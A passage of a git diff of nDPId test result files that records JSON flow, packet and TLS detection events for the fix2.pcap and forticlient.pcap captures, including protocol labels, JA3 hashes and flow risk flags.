+00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","packets-captured":3049,"packets-processed":3046,"total-skipped-flows":0,"total-l4-data-len":67956,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1614758889595} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3049/3046 diff --git a/test/results/forticlient.pcap.out b/test/results/forticlient.pcap.out index 235052a12..ca5d8bdbb 100644 --- a/test/results/forticlient.pcap.out +++ b/test/results/forticlient.pcap.out 
@@ -1,45 +1,45 @@ 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"forticlient.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1621067203571} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067203571,"flow_last_seen":1621067203571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067203571,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"} 
-01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01129{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 